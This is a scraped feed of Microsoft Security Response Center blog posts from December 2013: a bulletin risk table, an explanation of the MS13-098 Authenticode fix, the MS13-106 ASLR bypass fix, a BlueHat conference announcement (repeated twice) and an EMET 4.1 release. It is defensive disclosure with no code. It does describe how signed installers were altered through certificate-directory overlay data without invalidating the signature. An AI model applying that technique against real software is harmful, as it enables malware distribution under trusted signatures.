environment.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-099">MS13-099</a></p> <p>(VBScript)</p> </td> <td>Victim browses to a malicious webpage.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Not a vulnerability in the browser directly &ndash; however, the Scripting.Dictionary ActiveX control is on the pre-approved list and is allowed to load without prompt.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-105">MS13-105</a></p> <p>(Exchange)</p> </td> <td>Attacker sends email with malicious attachment and lures victim to view the attachment as a webpage within Outlook Web Access. The attacker could potentially compromise the server-side process generating the web page.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses Oracle Outside In issues included in the October 2013 security update: <a href="http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html">http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html</a></td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-098">MS13-098</a></p> <p>(Authenticode)</p> </td> <td>Victim computer infected because user runs / double-clicks a malicious installer that had been signed by a trusted 3rd party and subsequently altered by an attacker to download a malicious executable.</td> <td>Critical</td> <td>1</td> <td>Limited, targeted attacks expected to continue in next 30 days.</td> <td>This issue relies on user first choosing to run a malicious binary. More information on scope of this issue and additional hardening provided by the security update here: <a href="http://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspx">http://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspx</a></td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-100">MS13-100</a></p> <p>(SharePoint)</p> </td> <td>Attacker able to authenticate to vulnerable SharePoint server sends blob of data that is incorrectly de-serialized resulting in potential code execution server-side.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Successful attack elevates authenticated user to W3WP service account on the SharePoint site.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-101">MS13-101</a></p> <p>(Kernel mode drivers)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Addresses primarily win32k.sys local elevation of privilege vulnerabilities. The font case also being addressed results in denial-of-service only, not code execution.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-102">MS13-102</a></p> <p>(LPC)</p> </td> <td>Attacker running code at low privilege on Windows XP or Windows Server 2003 runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>Does not affect Windows Vista or any later versions of Windows.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a></p> <p>(hxds.dll ASLR mitigation bypass)</p> </td> <td>Attacker combines this vulnerability with a (separate) code execution vulnerability to compromise a system.</td> <td>Important</td> <td>n/a</td> <td>This issue has been leveraged as an exploit component in several real-world browser-based attacks.</td> <td>This vulnerability does not result in code execution directly. However, it is a component attackers use to bypass ASLR. Applying this security update will disrupt a number of in-the-wild exploits even in cases where an update is not applied for a code execution vulnerability.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-104">MS13-104</a></p> <p>(Office)</p> </td> <td>Attacker sends victim a link to malicious server. If victim clicks the link, browser makes a request to Microsoft&rsquo;s Office 365 server on behalf of the victim in such a way that a user token is captured by the malicious server, allowing owner of the malicious server to log in to SharePoint Online the same way the victim user would have been able to log in.</td> <td>Important</td> <td>n/a</td> <td>This issue was reported to us by Adallom after they detected targeted attacks leveraging this vulnerability.</td> <td>Affects customers who use Office 2013 to access the Office 365 SharePoint Online multi-tenant service.</td> </tr> <tr> <td> <p><a href="https://technet.microsoft.com/en-us/security/bulletin/ms13-103">MS13-103</a></p> <p>(SignalR)</p> </td> <td>Attacker sends victim a link exploiting a Cross-Site Scripting (XSS) vulnerability on an Intranet Visual Studio Team Foundation Server (TFS) for which they have access rights. If the victim clicks the link, an automatic action is taken on their behalf on the TFS server that they otherwise might not have wanted to execute.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC's engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3617353&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk AsessmentExploitability MS13-098: Update to enhance the security of Authenticodehttp://blogs.technet.com/b/srd/archive/2013/12/10/ms13-098-update-to-enhance-the-security-of-authenticode.aspxTue, 10 Dec 2013 17:20:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:2ed5f9d8-4e67-47a8-8df1-2380f8498a6dswiat0<p>Today we released <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a>, a security update that strengthens the <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff686697(v=vs.85).aspx">Authenticode</a> code-signing technology against attempts to modify a signed binary without invalidating the signature. This update addresses a specific instance of malicious binary modification that could allow a modified binary to pass the Authenticode signature check. More importantly, it also introduces further hardening to consider a binary &ldquo;unsigned&rdquo; if any modification has been made in a certain portion of the binary. Those improvements to the Authenticode Signature Verification, as described below, require changes from a small but important set of third party application developers, so the new process will not be enabled by default today. Six months from today, on June 10, 2014, binaries will be considered unsigned if they do not conform to the new verification process. If you want to enable the regkey and test the change today, Please see the information posted in the <a href="http://technet.microsoft.com/en-us/security/advisory/2915720">security advisory 2915720</a>.</p> <p>We&rsquo;d like to use this blog post to share more about Authenticode and the role of Authenticode in enabling customer confidence while running executables downloaded from the internet.</p> <p><strong>Authenticode and signed binaries</strong></p> <p>Authenticode&reg; is a digital signature format that is used to determine the origin and integrity of software binaries. Authenticode is based on Public-Key Cryptography Standards (PKCS) #7 signed data and X.509 certificates to bind an Authenticode-signed binary to the identity of a software publisher.</p> <p>The idea behind Authenticode is to leverage the reputation of a software developer or company to help customers make a trust decision. If you trust a particular company, you can execute binaries published by that company from any source and media as long as the binary is signed with the company&rsquo;s valid Authenticode signature. The valid Authenticode signature does not guarantee that the software is safe to run. However, it does prove that the binary has been signed by that particular company and has not been altered afterward. According to the Authenticode Portable Executable format specification the Authenticode signatures can be &ldquo;embedded&rdquo; in a Windows PE file, in a location specified by the Certificate Table entry in Optional Header Data Directories. When Authenticode is used to sign a Windows PE file, the algorithm that calculates the file's Authenticode hash value excludes certain PE fields. When embedding the signature in the file, the signing process can modify these fields without affecting the file's hash value. These fields are as follows: the checksum, certificate table RVA, certificate table size and the attribute certificate table. The certificate table contains a PKCS #7 SignedData structure containing the PE file's hash value, a signature created by the software publisher&rsquo;s private key, and the X.509 v3 certificates that bind the software publisher&rsquo;s signing key to a legal entity. A PKCS #7 SignedData structure can optionally contain:</p> <ul> <li>A description of the software publisher</li> <li>The software publisher's URL</li> <li>An Authenticode timestamp</li> </ul> <p>The following schema illustrates how an Authenticode signature is included in a Windows PE file:</p> <p><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/8358.authenticode.PNG"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-61-47/8358.authenticode.PNG" alt="" border="0" /></a></p> <p>This design philosophy allows no executable code being omitted from the signature. Once the code is authenticated and attributed to an author, everything that code does is the responsibility of the author.</p> <p><strong>Installer programs and Authenticode signatures</strong></p> <p>Downloaders and installers signed by Authenticode require special consideration because they download and execute other executables. As explained above, Authenticode testifies that a particular program&rsquo;s code was signed by the author and that the executable code has not changed since then. If that particular program is designed to download and run a second executable from the network, the original program needs to verify the second executable&rsquo;s integrity with Authenticode or by other means. The developers of a program should pay close attention to guarantee the same level of trust and integrity across the full download chain to ensure that executables downloaded by their installer are also trustworthy and cannot be replaced with a malicious program.</p> <p>Microsoft was informed that a small set of third party installer programs, signed with a valid Authenticode signature, had been modified to download a different executable than the one originally designed to download without invalidating the installer&rsquo;s Authenticode signature.</p> <p>We analyzed each of these samples to study the execution flow to learn how they worked. Firstly, the code, which is covered by Authenticode, is executed from the entry point. Then, this code looks for an overlay inside the file to read a stream. Finally, the code decrypts a URL from the stream and downloads and executes an executable from that URL. The programs unfortunately omitted the integrity check before executing the downloaded file.</p> <p>An overlay is data appended to the physical image of a Portable Executable. Explained simply, one can take a PE binary, append additional content to the end without adjusting the header, and it has an overlay. This data area is not defined as part of the image by the PE header and therefore isn't part of the virtual image of the loaded PE. The Authenticode verification code verifies that the Attribute Certificate table is the last thing in the file and report an invalid signature if something is appended after that.</p> <p>In the sample reported to Microsoft, the size of the certificate directory had been increased to cover the overlay. So technically, the certificate directory was the last thing in the file, allowing the test to pass.</p> <p>There are couple of lessons to learn from this sample:</p> <p>First, the developer stored the URL stream intentionally inside the certificate directory to allow them to sign once and create different installers. This particular sub-optimal practice enabled the malicious binary modification reported to Microsoft. The <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a> hardening, expected to go into effect June 10, 2014, will consider a binary unsigned in this case going forward.</p> <p>Second, the developer in this particular case was not validating the file subsequently downloaded and executed by any other means.</p> <p>A better way to enable the scenario desired by the developer would have been to store the URL as a resource inside the PE. In doing so, the URL would have been covered by Authenticode and any attempt to modify the downloaded URL would have resulted in a failed signature verification.</p> <p>Today, with <a href="http://technet.microsoft.com/en-us/security/bulletin/MS13-098">MS13-098</a>, as described above, the Windows team has added additional hardening and mitigation in order to detect this kind of bad practices and report an invalid Authenticode signature. When enabled, these hardening measures will detect cases where additional unverified data has been placed after the PKCS #7 blob in the certificate directory of a PE image. The check validates that there is no non-zero data beyond the PKCS #7 structure. Although this change prevents one form of this unsafe practice, it is not capable of preventing all such forms; for example, an application developer can place unverified data within the PKCS #7 blob itself which will not be taken into account when verifying the Authenticode signature. However, as this blog post illustrates, developers are strongly discouraged from doing this as it can lead to unsafe application behavior and could potentially put the reputation of the signing company at risk if their application makes use of the unverified data in an unsafe way.</p> <p>- Ali Rahbar, MSRC engineering team</p> <p>I would like to thank the Jonathan Ness, Elia Florio and Ali Pezeshk</p> <p>Ref : <a href="http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/Authenticode_PE.docx">http://download.microsoft.com/download/9/c/5/9c5b2167-8017-4bae-9fde-d599bac8184a/Authenticode_PE.docx</a></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3617343&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">trust decisionspoofing MS13-106: Farewell to another ASLR bypasshttp://blogs.technet.com/b/srd/archive/2013/12/09/ms13-106-another-aslr-bypass-is-gone.aspxTue, 10 Dec 2013 04:18:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:943fe6e0-234e-4acc-a3d4-691c3bb0915bswiat0<p style="text-align: justify;">Today we released <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a>&nbsp;which resolves a security feature bypass that can allow attackers to circumvent Address Space <br />Layout Randomization (ASLR)&nbsp;using a specific DLL library (HXDS.DLL) provided as part of Microsoft Office 2007 and 2010.</p> <p style="text-align: justify;">The existence of an ASLR bypass does not directly enable the execution of code and does not represent a risk by itself, since <br />this bypass still needs to be used in conjunction with another higher-severity vulnerability that allows remote code <br />execution in order to provide some value to attackers. ASLR is an important mitigation that has been supported <br />since Windows Vista which, when combined with Data Execution Prevention (DEP), makes it <a href="http://blogs.technet.com/b/srd/archive/2010/12/08/on-the-effectiveness-of-dep-and-aslr.aspx">more difficult to exploit memory <br />corruption vulnerabilities</a>.</p> <p style="text-align: justify;">Because ASLR is a generic mitigation aimed at stopping exploitation techniques that apply to many vulnerabilities, attackers <br />are very interested in attempting to find new bypass techniques for it. These bypass techniques typically fall into one of <br />three categories:</p> <p style="text-align: justify; padding-left: 30px;">1)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Presence of a DLL at runtime that has not been compiled with /DYNAMICBASE flag&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;(therefore loaded at a predictable location in memory).</p> <p style="text-align: justify; padding-left: 30px;">2)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Presence of predictable memory regions or pointers that can be leveraged to execute code&nbsp;<br />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or alter program behavior.</p> <p style="text-align: justify; padding-left: 30px;">3)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Leveraging a vulnerability to dynamically disclose memory addresses.</p> <p style="text-align: justify;"><br />The ASLR bypass that has been addressed by MS13-106 falls into the first category. The difficulty of finding and using an <br />ASLR bypass varies based on the category of the technique. It is generally easier to identify DLL modules that fall into the <br />first category (especially expanding the search through third-party browser plugins and toolbars), while it is generally more <br />difficult, and less reusable, to find or create a bypass for the other two categories. For example, two of the recent <br />Internet Explorer exploits that were used in targeted attacks (<a href="http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx">CVE-2013-3893</a>&nbsp;and <a href="http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx">CVE-2013-3897</a>) both relied on the <br />same ASLR bypass, which fell into the first category -- making use of the HXDS.DLL library that is part of Office 2007/2010 <br />that was not compiled using /DYNAMICBASE.</p> <p style="text-align: justify;">Bolstering the effectiveness of ASLR helps to harden the security of our products and that is why MSRC continues to release<br />tools and updates that enforce ASLR more broadly on Windows (such as <a href="http://support.microsoft.com/kb/2639308">KB2639308</a>&nbsp;and&nbsp;<a href="http://www.microsoft.com/emet">EMET</a>) and to release updates that <br />close known ASLR bypasses as part of our defense-in-depth strategy (such as <a href="http://blogs.technet.com/b/srd/archive/2013/08/12/mitigating-the-ldrhotpatchroutine-dep-aslr-bypass-with-ms13-063.aspx">MS13-063</a>&nbsp;for the bypass presented at<br />CanSecWest 2013).</p> <p style="text-align: justify;"><br />Today <a href="http://technet.microsoft.com/en-us/security/bulletin/ms13-106">MS13-106</a>&nbsp;closes one additional known bypass that will no longer be available to attackers.</p> <p style="text-align: justify;">&nbsp;<br />- Elia Florio, MSRC Engineering</p> <p style="text-align: justify;">&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3617195&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">HXDS.DLLExploitASLRMS13-106bypass BlueHat v13 is Cominghttp://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspxFri, 06 Dec 2013 23:34:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:80406a7c-a97c-4e40-918b-86ee57cf1529BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3616644http://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspx#comments<p>This week, starting Thursday, we&rsquo;ll be hosting our 13<sup>th </sup>edition of BlueHat. I&rsquo;m always so impressed with the level of knowledge we attract to each BlueHat, and while the event is invite-only, we&rsquo;ll be sharing glimpses into the event via this blog and the hashtag #BlueHat.</p> <p>For each of the past six years I have had the honor to work among some of the most talented engineers I have ever met, here at Microsoft. I am inspired by the mission we embrace in securing our products, devices, and services. There are few other vantage points with as broad a footprint on the internet, since one of Microsoft&rsquo;s early mottos helped put &ldquo;a computer in every home.&rdquo; Our job in the Microsoft Security Response Center (MSRC) is to help protect the customers who use the technology that the rest of the company works so hard to create. In everything we do in the MSRC, we strive to fulfill our mission to help insure the security and privacy of over a billion computer systems and our customers worldwide.</p> <p>In 2005, we started the BlueHat conference to educate the developers and executives of Microsoft about current and emerging threats. The idea was to bring the hackers and security researchers to us, and in doing so foster an environment where the bidirectional exchange of ideas around the balance between security and functionality could meet fertile ground in the famed &ldquo;hallway track.&rdquo; We hand-pick just a small number of speakers and external attendees to concentrate on learning from them in most cases, and the chance to teach some of them from what we have learned, to help enhance the security and privacy of the Internet as a whole.</p> <p>This year is no different in that we have invited speakers chosen to educate, amaze, and work with Microsoft to help us understand the emerging security threats to us and our customers. Together, we will rise to face the most important challenges in helping to secure the global Internet ecosystem.</p> <p>Beginning on Dec 12, 2013, we&rsquo;ll begin this year&rsquo;s BlueHat by focusing on the threat landscape, learning about determined adversaries to help us defend our own network and assets, and tools to detect and mitigate attacks. Next we&rsquo;ll welcome some of the world&rsquo;s top experts to discuss devices and services, from low-level hardware to web services, to help us build products, devices, and services that are more secure from the ground up.</p> <p>Finally, we&rsquo;ll close out the conference with a thought-provoking track that I like to call the &ldquo;Persistence of Trust,&rdquo; where we will discuss the core elements that comprise the trust we rely on to support what the Internet has become &ndash; a global information sharing network that humanity uses to exchange goods, services, money, and most importantly, ideas. To support these functions, we must strengthen the technology that underlies and supports that trust, and we must design products, devices, and services that are resistant to security and privacy breaches.&nbsp;</p> <p>Here&rsquo;s a quick overview of the planned speaker lineup for the two days of BlueHat v13.</p> <p><strong>Day 1: Thursday, December 12</strong></p> <p>Microsoft Technical Fellow, Anders Vinberg, will open BlueHat&rsquo;s first track, <strong>Threat Landscape</strong>. Anders will talk about a broad assurance initiative for the next wave, covering Windows Server and System Center, in close alignment with the Core OS team, identity, Office and Azure. Next, we&rsquo;ll set the stage with a talk from FireEye&rsquo;s Zheng Bu and YiChong Lin designed to walk us through the techniques of the average and not so average targeted attacker, and show us ways to detect and combat the adversary. Microsoft Partner Development Manager, Mario Goertzel, will then speak to some of the hard problems that we face in antimalware - specifically, how we equip customers and partners with the right tools and analysis to help us all defend our networks and assets.&nbsp;Closing out the Threat Landscape track, Microsoft Principal Security Program Manager Lead, Graham Calladine, and Microsoft Senior Security Software Development Engineer, Thomas Garnier, will walk us through what attackers are doing now, how our current products and practices work against us, and how we can change this.</p> <p>After lunch, the <strong>Devices &amp; Services </strong>track kicks off with Josh Thomas, whose DARPA-funded research will reveal some hardware-level universal attacks that are possible on mobile devices. Next up we will have Microsoft&rsquo;s first Mitigation Bypass Bounty recipient, James Forshaw talk about executing unsigned code on the Surface RT, without jailbreaking it. Next, Microsoft Principal Software Development Engineer, Lee Holmes, will talk with us about PowerShell. Chris Tarnovsky will then discuss Semiconductor devices and their backward steps in physical security through higher common criteria ratings. Next up, we&rsquo;ll hear from Microsoft Partner Development Manager, Chris Kaler, and Microsoft Senior Program Manager, Serge Mera, about the latest in Message Analyzer. Mario Heiderich will then take us into the wilds of JavaScript MVC and templating frameworks. The afternoon will wrap up with a call to action from our own Russ McRee, followed by several lightning talks.</p> <p><strong>Day 2: Friday, December 13</strong></p> <p>Taking into consideration the inevitable socializing from the night before, we&rsquo;re giving our attendees a slow morning. Between 9:00 AM and 12:00 noon we&rsquo;ll have a recovery brunch with mimosas, lightning talks, and the famed hallway track. I&rsquo;ll be the Day 2 keynote opening the track <strong>Persistence of Trust, </strong>at 12:30 noon. My talk will focus on security strategy at Microsoft, what we&rsquo;re doing in terms of our defensive industry partner programs like MAPP, and of course, I&rsquo;ll provide an update on our <a href="http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx">strategic Bounty programs</a>. I&rsquo;ll then handoff to Justin Troutman, who will talk about Mackerel, a cryptographic design and development framework based on the premise that real-world cryptography is not about cryptography at all; it's about products. Peter Gutmann, famed researcher with the University of Auckland, New Zealand, will take the stage and illuminate the psychology of computer insecurity. After a short break, Alex Stamos, CTO of Artemis Internet, and Tom Ritter, Principal Security Engineer with iSEC Partners, will awaken us with tales life after elliptic curve crypto&rsquo;s coming extinction. From Bromium Labs we&rsquo;ll hear from Rahul Kashyap and Rafal Wojtczuk, who will discuss and demonstrate how to reliably break out of various popular sandboxes. Finally, closing BlueHat v13, renowned security and privacy expert and advocate of human rights, Morgan Marquis-Boire will explore what I call the elephant in the room, as he discusses the surveillance landscape and coercion resistant design.</p> <p>As chair of the BlueHat content board, I would be remiss in my duty to the mission of BlueHat if I ignored the revelations of the summer of 2013, and the concerns about government surveillance of the internet. Hence, we will be continuing our internal dialog with a conversation with Morgan and others in attendance on how to design products, devices, and services that are more resistant to abuse and surveillance. &nbsp;For us, and for over a billion of our customers worldwide, this issue transcends borders and politics. We are a global company and part of a global community, and as such we will continue to work with our customers, partners, and even our competitors to ensure a safer, more trustworthy Internet for all.</p> <p>From the age of the great worms, to the evolution of more sophisticated and targeted attacks, to the era where modern warfare takes place on not only the information superhighway, but also on the civilian streets of the Internet, we will serve faithfully in our mission to help protect our customers from security and privacy breaches, no matter the adversary.</p> <p>&nbsp;</p> <p>BlueHat is coming. Brace yourselves.</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist</p> <p>Microsoft Security Response Center</p> <p>http://twitter.com/k8em0</p> <p>(that&rsquo;s a zero)</p> <p>&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3616644&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> BlueHat v13 is Cominghttp://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspxFri, 06 Dec 2013 23:34:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:80406a7c-a97c-4e40-918b-86ee57cf1529BlueHat10http://blogs.technet.com/b/bluehat/rsscomments.aspx?WeblogPostID=3616644http://blogs.technet.com/b/bluehat/archive/2013/12/06/bluehat-v13-is-coming.aspx#comments<p>This week, starting Thursday, we&rsquo;ll be hosting our 13<sup>th </sup>edition of BlueHat. I&rsquo;m always so impressed with the level of knowledge we attract to each BlueHat, and while the event is invite-only, we&rsquo;ll be sharing glimpses into the event via this blog and the hashtag #BlueHat.</p> <p>For each of the past six years I have had the honor to work among some of the most talented engineers I have ever met, here at Microsoft. I am inspired by the mission we embrace in securing our products, devices, and services. There are few other vantage points with as broad a footprint on the internet, since one of Microsoft&rsquo;s early mottos helped put &ldquo;a computer in every home.&rdquo; Our job in the Microsoft Security Response Center (MSRC) is to help protect the customers who use the technology that the rest of the company works so hard to create. In everything we do in the MSRC, we strive to fulfill our mission to help insure the security and privacy of over a billion computer systems and our customers worldwide.</p> <p>In 2005, we started the BlueHat conference to educate the developers and executives of Microsoft about current and emerging threats. The idea was to bring the hackers and security researchers to us, and in doing so foster an environment where the bidirectional exchange of ideas around the balance between security and functionality could meet fertile ground in the famed &ldquo;hallway track.&rdquo; We hand-pick just a small number of speakers and external attendees to concentrate on learning from them in most cases, and the chance to teach some of them from what we have learned, to help enhance the security and privacy of the Internet as a whole.</p> <p>This year is no different in that we have invited speakers chosen to educate, amaze, and work with Microsoft to help us understand the emerging security threats to us and our customers. Together, we will rise to face the most important challenges in helping to secure the global Internet ecosystem.</p> <p>Beginning on Dec 12, 2013, we&rsquo;ll begin this year&rsquo;s BlueHat by focusing on the threat landscape, learning about determined adversaries to help us defend our own network and assets, and tools to detect and mitigate attacks. Next we&rsquo;ll welcome some of the world&rsquo;s top experts to discuss devices and services, from low-level hardware to web services, to help us build products, devices, and services that are more secure from the ground up.</p> <p>Finally, we&rsquo;ll close out the conference with a thought-provoking track that I like to call the &ldquo;Persistence of Trust,&rdquo; where we will discuss the core elements that comprise the trust we rely on to support what the Internet has become &ndash; a global information sharing network that humanity uses to exchange goods, services, money, and most importantly, ideas. To support these functions, we must strengthen the technology that underlies and supports that trust, and we must design products, devices, and services that are resistant to security and privacy breaches.&nbsp;</p> <p>Here&rsquo;s a quick overview of the planned speaker lineup for the two days of BlueHat v13.</p> <p><strong>Day 1: Thursday, December 12</strong></p> <p>Microsoft Technical Fellow, Anders Vinberg, will open BlueHat&rsquo;s first track, <strong>Threat Landscape</strong>. Anders will talk about a broad assurance initiative for the next wave, covering Windows Server and System Center, in close alignment with the Core OS team, identity, Office and Azure. Next, we&rsquo;ll set the stage with a talk from FireEye&rsquo;s Zheng Bu and YiChong Lin designed to walk us through the techniques of the average and not so average targeted attacker, and show us ways to detect and combat the adversary. Microsoft Partner Development Manager, Mario Goertzel, will then speak to some of the hard problems that we face in antimalware - specifically, how we equip customers and partners with the right tools and analysis to help us all defend our networks and assets.&nbsp;Closing out the Threat Landscape track, Microsoft Principal Security Program Manager Lead, Graham Calladine, and Microsoft Senior Security Software Development Engineer, Thomas Garnier, will walk us through what attackers are doing now, how our current products and practices work against us, and how we can change this.</p> <p>After lunch, the <strong>Devices &amp; Services </strong>track kicks off with Josh Thomas, whose DARPA-funded research will reveal some hardware-level universal attacks that are possible on mobile devices. Next up we will have Microsoft&rsquo;s first Mitigation Bypass Bounty recipient, James Forshaw talk about executing unsigned code on the Surface RT, without jailbreaking it. Next, Microsoft Principal Software Development Engineer, Lee Holmes, will talk with us about PowerShell. Chris Tarnovsky will then discuss Semiconductor devices and their backward steps in physical security through higher common criteria ratings. Next up, we&rsquo;ll hear from Microsoft Partner Development Manager, Chris Kaler, and Microsoft Senior Program Manager, Serge Mera, about the latest in Message Analyzer. Mario Heiderich will then take us into the wilds of JavaScript MVC and templating frameworks. The afternoon will wrap up with a call to action from our own Russ McRee, followed by several lightning talks.</p> <p><strong>Day 2: Friday, December 13</strong></p> <p>Taking into consideration the inevitable socializing from the night before, we&rsquo;re giving our attendees a slow morning. Between 9:00 AM and 12:00 noon we&rsquo;ll have a recovery brunch with mimosas, lightning talks, and the famed hallway track. I&rsquo;ll be the Day 2 keynote opening the track <strong>Persistence of Trust, </strong>at 12:30 noon. My talk will focus on security strategy at Microsoft, what we&rsquo;re doing in terms of our defensive industry partner programs like MAPP, and of course, I&rsquo;ll provide an update on our <a href="http://blogs.technet.com/b/bluehat/archive/2013/11/01/bounty-evolution-100-000-for-new-mitigation-bypass-techniques-wanted-dead-or-alive.aspx">strategic Bounty programs</a>. I&rsquo;ll then handoff to Justin Troutman, who will talk about Mackerel, a cryptographic design and development framework based on the premise that real-world cryptography is not about cryptography at all; it's about products. Peter Gutmann, famed researcher with the University of Auckland, New Zealand, will take the stage and illuminate the psychology of computer insecurity. After a short break, Alex Stamos, CTO of Artemis Internet, and Tom Ritter, Principal Security Engineer with iSEC Partners, will awaken us with tales life after elliptic curve crypto&rsquo;s coming extinction. From Bromium Labs we&rsquo;ll hear from Rahul Kashyap and Rafal Wojtczuk, who will discuss and demonstrate how to reliably break out of various popular sandboxes. Finally, closing BlueHat v13, renowned security and privacy expert and advocate of human rights, Morgan Marquis-Boire will explore what I call the elephant in the room, as he discusses the surveillance landscape and coercion resistant design.</p> <p>As chair of the BlueHat content board, I would be remiss in my duty to the mission of BlueHat if I ignored the revelations of the summer of 2013, and the concerns about government surveillance of the internet. Hence, we will be continuing our internal dialog with a conversation with Morgan and others in attendance on how to design products, devices, and services that are more resistant to abuse and surveillance. &nbsp;For us, and for over a billion of our customers worldwide, this issue transcends borders and politics. We are a global company and part of a global community, and as such we will continue to work with our customers, partners, and even our competitors to ensure a safer, more trustworthy Internet for all.</p> <p>From the age of the great worms, to the evolution of more sophisticated and targeted attacks, to the era where modern warfare takes place on not only the information superhighway, but also on the civilian streets of the Internet, we will serve faithfully in our mission to help protect our customers from security and privacy breaches, no matter the adversary.</p> <p>&nbsp;</p> <p>BlueHat is coming. Brace yourselves.</p> <p>&nbsp;</p> <p>Katie Moussouris</p> <p>Senior Security Strategist</p> <p>Microsoft Security Response Center</p> <p>http://twitter.com/k8em0</p> <p>(that&rsquo;s a zero)</p> <p>&nbsp;</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3616644&AppID=4967&AppType=Weblog&ContentType=0" width="1" height="1"> Introducing Enhanced Mitigation Experience Toolkit (EMET) 4.1http://blogs.technet.com/b/srd/archive/2013/11/12/introducing-enhanced-mitigation-experience-toolkit-emet-4-1.aspxTue, 12 Nov 2013 21:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:21bbff67-04c7-42ba-a287-3d42ec9828dbswiat0<p>In June 2013, we released EMET 4.0 and customer response has been fantastic. Many customers across the world now include EMET as part of their defense-in-depth strategy and appreciate how EMET helps businesses prevent attackers from gaining access to computers systems. Today, we&rsquo;re releasing a new version, <a href="http://www.microsoft.com/en-us/download/details.aspx?id=41138"> EMET 4.1</a>, with updates that simplify configuration and accelerate deployment.</p> <p>EMET anticipates the most common techniques adversaries might use and shields computer systems against those security threats. EMET uses security mitigation technologies such as Data Execution Prevention (DEP), Mandatory Address Space Layout Randomization (ASLR), Structured Exception Handler Overwrite Protection (SEHOP), Export Address Table Access Filtering (EAF), Anti-ROP, and SSL/TLS Certificate Trust&nbsp;Pinning, to help protect computer systems from new or undiscovered threats. EMET can also protect legacy applications or third party line of business applications where you do not have access to the source code.</p> <p>Today&rsquo;s EMET 4.1 release includes new functionality and updates, such as:</p> <ul> <li>Updated default protection profiles, Certificate Trust rules, and Group Policy Object configuration.</li> <li>Shared remote desktop environments are now supported on Windows servers where EMET is installed.</li> <li>Improved Windows Event logging mechanism allows for more accurate reporting in multi-user scenarios.</li> <li>Several application-compatibility enhancements and mitigation false positive reporting.</li> </ul> <p>EMET built by Microsoft Security Research Center (MSRC) engineering team, brings the latest in security science to your organization. While many EMET users exchange feedback and ideas at <a href="http://social.technet.microsoft.com/Forums/en/emet/threads">TechNet user forums</a>, a less known fact is that Microsoft Premier Support options are also available for businesses that deploy EMET within their enterprise. Many of our customers deploy EMET - at scale - through the Microsoft System Center Configuration manager and apply enterprise application, user and accounts rules through Group Policy. EMET works well with the tools and support options our 